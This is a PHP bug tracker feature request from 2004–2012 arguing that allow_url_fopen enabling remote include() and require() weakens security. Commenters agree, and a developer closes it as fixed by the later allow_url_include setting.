php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Request #28684 allow_url_fopen drops security down
Submitted: 2004-06-07 22:43 UTC Modified: 2012-04-09 22:12 UTC
Votes:5
Avg. Score:5.0 ± 0.0
Reproduced:4 of 4 (100.0%)
Same Version:1 (25.0%)
Same OS:2 (50.0%)
From: php at koteroff dot ru Assigned: nikic (profile)
Status: Closed Package: *General Issues
PHP Version: 4.3.6 OS: *
Private report: No CVE-ID: None
 [2004-06-07 22:43 UTC] php at koteroff dot ru
Description:
------------
First, we have documentation problem:
http://php.net/ini-set
allow_url_fopen "1" PHP_INI_ALL 
Not PHP_INI_ALL, but PHP_INI_SYSTEM (according to my experiments and CHANGELOG).
(But it was described here: http://bugs.php.net/bug.php?id=28497&edit=2 ).

Second, in new version of PHP allow_url_fopen touches include() and require() to. It's terribly! Security of scripts falls down! And (thanks to PHP_INI_SYSTEM) we cannot switch off allow_url_fopen for personal sites, only for all server globally.

I have a proposal: make directive which will enable using of fopen wrappers in include()-functions. This directive should be SEPARATED from allow_url_fopen and allowed to be switched off not in php.ini only. Or just allow to switch off allow_url_fopen from everywhere (but not switch on, only off).

(Personally I think that it was bad idea to add fopen wreppers support in include functions at all, but what was made ? is what is made).

Thanks.


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2004-06-23 03:01 UTC] no at email dot zz
I wish allow_url_fopen could be disabled by default and then 3rd party scripts that actually need the functionality are able to enable it with an allow_url_fopen (TRUE); call or something. Many scripts use include() and require() that should never be using remote URLs.

The global 'on' or 'off' setting is way too permissive and doesn't make securing PHP very easy.
 [2006-07-10 22:08 UTC] tim at e2-media dot co dot nz
require() working on remote files by default is singlehandedly responsible for a significant chunk of security holes in php apps. I definitely agree that require/include should be treated very differently to file_get_contents and other functions using wrappers - evaluating code is dangerous.
 [2012-04-09 22:12 UTC] nikic@php.net
-Status: Open +Status: Closed -Package: Feature/Change Request +Package: *General Issues -Assigned To: +Assigned To: nikic
 [2012-04-09 22:12 UTC] nikic@php.net
Closing this as this was already fixed long ago (with allow_url_include).
 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Mon Oct 14 20:01:26 2019 UTC